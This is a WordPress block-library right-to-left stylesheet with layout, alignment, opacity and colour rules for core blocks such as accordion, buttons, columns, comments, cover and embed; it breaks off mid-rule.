dist/block-library/style-rtl.cssnuȯ@charset "UTF-8"; .wp-block-accordion{ box-sizing:border-box; } .wp-block-accordion-item.is-open>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{ transform:rotate(-45deg); } @media (prefers-reduced-motion:no-preference){ .wp-block-accordion-item{ transition:grid-template-rows .3s ease-out; } .wp-block-accordion-item>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{ transition:transform .2s ease-in-out; } } .wp-block-accordion-heading__toggle{ align-items:center; background:none; border:none; color:inherit; cursor:pointer; display:flex; font-family:inherit; font-size:inherit; font-style:inherit; font-weight:inherit; letter-spacing:inherit; line-height:inherit; overflow:hidden; padding:var(--wp--preset--spacing--20, 1em) 0; text-align:inherit; text-decoration:inherit; text-transform:inherit; width:100%; word-spacing:inherit; } .wp-block-accordion-heading__toggle:not(:focus-visible){ outline:none; } .wp-block-accordion-heading__toggle:hover .wp-block-accordion-heading__toggle-title{ text-decoration:underline; } .wp-block-accordion-heading__toggle-title{ flex:1; } .wp-block-accordion-heading__toggle-icon{ align-items:center; display:flex; height:1.2em; justify-content:center; width:1.2em; } .wp-block-accordion-panel[aria-hidden=true],.wp-block-accordion-panel[inert]{ display:none; margin-block-start:0; } .wp-block-archives{ box-sizing:border-box; } .wp-block-archives-dropdown label{ display:block; } .wp-block-avatar{ line-height:0; } .wp-block-avatar,.wp-block-avatar img{ box-sizing:border-box; } .wp-block-avatar.aligncenter{ text-align:center; } .wp-block-audio{ box-sizing:border-box; } .wp-block-audio :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .wp-block-audio audio{ min-width:300px; width:100%; } .wp-block-breadcrumbs{ box-sizing:border-box; } .wp-block-breadcrumbs ol{ flex-wrap:wrap; list-style:none; } .wp-block-breadcrumbs li,.wp-block-breadcrumbs ol{ align-items:center; display:flex; margin:0; padding:0; } .wp-block-breadcrumbs li:not(:last-child):after{ content:var(--separator, "/"); margin:0 .5em; opacity:.7; } .wp-block-breadcrumbs span{ color:inherit; } .wp-block-button__link{ align-content:center; box-sizing:border-box; cursor:pointer; display:inline-block; height:100%; text-align:center; word-break:break-word; } .wp-block-button__link.aligncenter{ text-align:center; } .wp-block-button__link.alignright{ text-align:right; } :where(.wp-block-button__link){ border-radius:9999px; box-shadow:none; padding:calc(.667em + 2px) calc(1.333em + 2px); text-decoration:none; } .wp-block-button[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons>.wp-block-button.has-custom-width{ max-width:none; } .wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{ width:100%; } .wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-buttons>.wp-block-button.wp-block-button__width-25{ width:calc(25% - var(--wp--style--block-gap, .5em)*.75); } .wp-block-buttons>.wp-block-button.wp-block-button__width-50{ width:calc(50% - var(--wp--style--block-gap, .5em)*.5); } .wp-block-buttons>.wp-block-button.wp-block-button__width-75{ width:calc(75% - var(--wp--style--block-gap, .5em)*.25); } .wp-block-buttons>.wp-block-button.wp-block-button__width-100{ flex-basis:100%; width:100%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{ width:25%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{ width:50%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{ width:75%; } .wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{ border-radius:0; } .wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{ border-radius:0 !important; } :root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){ border:2px solid; padding:.667em 1.333em; } :root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){ color:currentColor; } :root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){ background-color:initial; background-image:none; } .wp-block-buttons{ box-sizing:border-box; } .wp-block-buttons.is-vertical{ flex-direction:column; } .wp-block-buttons.is-vertical>.wp-block-button:last-child{ margin-bottom:0; } .wp-block-buttons>.wp-block-button{ display:inline-block; margin:0; } .wp-block-buttons.is-content-justification-left{ justify-content:flex-start; } .wp-block-buttons.is-content-justification-left.is-vertical{ align-items:flex-start; } .wp-block-buttons.is-content-justification-center{ justify-content:center; } .wp-block-buttons.is-content-justification-center.is-vertical{ align-items:center; } .wp-block-buttons.is-content-justification-right{ justify-content:flex-end; } .wp-block-buttons.is-content-justification-right.is-vertical{ align-items:flex-end; } .wp-block-buttons.is-content-justification-space-between{ justify-content:space-between; } .wp-block-buttons.aligncenter{ text-align:center; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{ margin-left:auto; margin-right:auto; width:100%; } .wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-buttons .wp-block-button__link{ width:100%; } .wp-block-button.aligncenter,.wp-block-calendar{ text-align:center; } .wp-block-calendar td,.wp-block-calendar th{ border:1px solid; padding:.25em; } .wp-block-calendar th{ font-weight:400; } .wp-block-calendar caption{ background-color:inherit; } .wp-block-calendar table{ border-collapse:collapse; width:100%; } .wp-block-calendar table.has-background th{ background-color:inherit; } .wp-block-calendar table.has-text-color th{ color:inherit; } .wp-block-calendar :where(table:not(.has-text-color)){ color:#40464d; } .wp-block-calendar :where(table:not(.has-text-color)) td,.wp-block-calendar :where(table:not(.has-text-color)) th{ border-color:#ddd; } :where(.wp-block-calendar table:not(.has-background) th){ background:#ddd; } .wp-block-categories{ box-sizing:border-box; } .wp-block-categories.alignleft{ margin-right:2em; } .wp-block-categories.alignright{ margin-left:2em; } .wp-block-categories.wp-block-categories-dropdown.aligncenter{ text-align:center; } .wp-block-categories .wp-block-categories__label{ display:block; width:100%; } .wp-block-code{ box-sizing:border-box; } .wp-block-code code{ direction:ltr; display:block; font-family:inherit; overflow-wrap:break-word; text-align:initial; white-space:pre-wrap; } .wp-block-columns{ box-sizing:border-box; display:flex; flex-wrap:wrap !important; } @media (min-width:782px){ .wp-block-columns{ flex-wrap:nowrap !important; } } .wp-block-columns{ align-items:normal !important; } .wp-block-columns.are-vertically-aligned-top{ align-items:flex-start; } .wp-block-columns.are-vertically-aligned-center{ align-items:center; } .wp-block-columns.are-vertically-aligned-bottom{ align-items:flex-end; } @media (max-width:781px){ .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{ flex-basis:100% !important; } } @media (min-width:782px){ .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{ flex-grow:0; } } .wp-block-columns.is-not-stacked-on-mobile{ flex-wrap:nowrap !important; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{ flex-grow:0; } :where(.wp-block-columns){ margin-bottom:1.75em; } :where(.wp-block-columns.has-background){ padding:1.25em 2.375em; } .wp-block-column{ flex-grow:1; min-width:0; overflow-wrap:break-word; word-break:break-word; } .wp-block-column.is-vertically-aligned-top{ align-self:flex-start; } .wp-block-column.is-vertically-aligned-center{ align-self:center; } .wp-block-column.is-vertically-aligned-bottom{ align-self:flex-end; } .wp-block-column.is-vertically-aligned-stretch{ align-self:stretch; } .wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{ width:100%; } .wp-block-post-comments{ box-sizing:border-box; } .wp-block-post-comments .alignleft{ float:right; } .wp-block-post-comments .alignright{ float:left; } .wp-block-post-comments .navigation:after{ clear:both; content:""; display:table; } .wp-block-post-comments .commentlist{ clear:both; list-style:none; margin:0; padding:0; } .wp-block-post-comments .commentlist .comment{ min-height:2.25em; padding-right:3.25em; } .wp-block-post-comments .commentlist .comment p{ font-size:1em; line-height:1.8; margin:1em 0; } .wp-block-post-comments .commentlist .children{ list-style:none; margin:0; padding:0; } .wp-block-post-comments .comment-author{ line-height:1.5; } .wp-block-post-comments .comment-author .avatar{ border-radius:1.5em; display:block; float:right; height:2.5em; margin-left:.75em; margin-top:.5em; width:2.5em; } .wp-block-post-comments .comment-author cite{ font-style:normal; } .wp-block-post-comments .comment-meta{ font-size:.875em; line-height:1.5; } .wp-block-post-comments .comment-meta b{ font-weight:400; } .wp-block-post-comments .comment-meta .comment-awaiting-moderation{ display:block; margin-bottom:1em; margin-top:1em; } .wp-block-post-comments .comment-body .commentmetadata{ font-size:.875em; } .wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-post-comments .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-post-comments .comment-reply-title{ margin-bottom:0; } .wp-block-post-comments .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-right:.5em; } .wp-block-post-comments .reply{ font-size:.875em; margin-bottom:1.4em; } .wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{ border:1px solid #949494; font-family:inherit; font-size:1em; } .wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{ padding:calc(.667em + 2px); } :where(.wp-block-post-comments input[type=submit]){ border:none; } .wp-block-comments{ box-sizing:border-box; } .wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ font-size:inherit; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{ display:inline-block; margin-left:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{ display:inline-block; margin-right:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-comments-pagination.aligncenter{ justify-content:center; } .wp-block-comment-template{ box-sizing:border-box; list-style:none; margin-bottom:0; max-width:100%; padding:0; } .wp-block-comment-template li{ clear:both; } .wp-block-comment-template ol{ list-style:none; margin-bottom:0; max-width:100%; padding-right:2rem; } .wp-block-comment-template.alignleft{ float:right; } .wp-block-comment-template.aligncenter{ margin-left:auto; margin-right:auto; width:fit-content; } .wp-block-comment-template.alignright{ float:left; } .wp-block-comment-date{ box-sizing:border-box; } .comment-awaiting-moderation{ display:block; font-size:.875em; line-height:1.5; } .wp-block-comment-author-name,.wp-block-comment-content,.wp-block-comment-edit-link,.wp-block-comment-reply-link{ box-sizing:border-box; } .wp-block-cover,.wp-block-cover-image{ align-items:center; background-position:50%; box-sizing:border-box; direction:ltr; display:flex; justify-content:center; min-height:430px; overflow:hidden; overflow:clip; padding:1em; position:relative; } .wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){ background-color:#000; } .wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{ background-color:initial; } .wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{ background-color:inherit; content:""; } .wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{ bottom:0; left:0; opacity:.5; position:absolute; right:0; top:0; } .wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{ opacity:.1; } .wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{ opacity:.2; } .wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{ opacity:.3; } .wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{ opacity:.4; } .wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{ opacity:.5; } .wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{ opacity:.6; } .wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{ opacity:.7; } .wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{ opacity:.8; } .wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{ opacity:.9; } .wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{ opacity:1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{ opacity:0; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{ opacity:.1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{ opacity:.2; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{ opacity:.3; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{ opacity:.4; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{ opacity:.5; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{ opacity:.6; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{ opacity:.7; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{ opacity:.8; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{ opacity:.9; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{ opacity:1; } .wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{ max-width:420px; width:100%; } .wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{ display:flex; } .wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{ color:inherit; direction:rtl; position:relative; width:100%; } .wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{ align-items:flex-start; justify-content:flex-start; } .wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{ align-items:flex-start; justify-content:center; } .wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{ align-items:flex-start; justify-content:flex-end; } .wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{ align-items:center; justify-content:flex-start; } .wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{ align-items:center; justify-content:center; } .wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{ align-items:center; justify-content:flex-end; } .wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{ align-items:flex-end; justify-content:flex-start; } .wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{ align-items:flex-end; justify-content:center; } .wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{ align-items:flex-end; justify-content:flex-end; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{ margin:0; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{ margin:0; width:auto; } .wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{ border:none; bottom:0; box-shadow:none; height:100%; left:0; margin:0; max-height:none; max-width:none; object-fit:cover; outline:none; padding:0; position:absolute; right:0; top:0; width:100%; } .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:fixed; background-repeat:no-repeat; background-size:cover; } @supports (-webkit-touch-callout:inherit){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } @media (prefers-reduced-motion:reduce){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } .wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{ background-repeat:repeat; background-size:auto; } .wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{ color:#fff; } .wp-block-cover-image .wp-block-cover.has-left-content{ justify-content:flex-start; } .wp-block-cover-image .wp-block-cover.has-right-content{ justify-content:flex-end; } .wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{ margin-right:0; text-align:right; } .wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{ margin-left:0; text-align:left; } .wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{ font-size:2em; line-height:1.25; margin-bottom:0; max-width:840px; padding:.44em; text-align:center; z-index:1; } :where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){ color:#fff; } :where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){ color:#000; } :root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){ color:inherit; } body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__image-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__video-background{ z-index:0; } body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__gradient-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)).has-background-dim:not(.has-background-gradient):before{ z-index:1; } .has-modal-open body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container{ z-index:auto; } .wp-block-details{ box-sizing:border-box; } .wp-block-details summary{ cursor:pointer; } .wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{ max-width:360px; width:100%; } .wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{ min-width:280px; } .wp-block-cover .wp-block-embed{ min-height:240px; min-width:320px; } .wp-block-embed{ overflow-wrap:break-word; } .wp-block-embed :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .wp-block-embed iframe{ max-width:100%; } .wp-block-embed__wrapper{ position:relative; } .wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{ content:""; display:block; padding-top:50%; } .wp-embed-responsive .wp-has-aspect-ratio iframe{ bottom:0; height:100%; left:0; position:absolute; right:0; top:0; width:100%; } .wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{ padding-top:42.85%; } .wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{ padding-top:50%; } .wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{ padding-top:56.25%; } .wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{ padding-top:75%; } .wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{ padding-top:100%; } .wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{ padding-top:177.77%; } .wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{ padding-top:200%; } .wp-block-file{ box-sizing:border-box; } .wp-block-file:not(.wp-element-button){ font-size:.8em; } .wp-block-file.aligncenter{ text-align:center; } .wp-block-file.alignright{ text-align:right; } .wp-block-file *+.wp-block-file__button{ margin-right:.75em; } :where(.wp-block-file){ margin-bottom:1.5em; } .wp-block-file__embed{ margin-bottom:1em; } :where(.wp-block-file__button){ 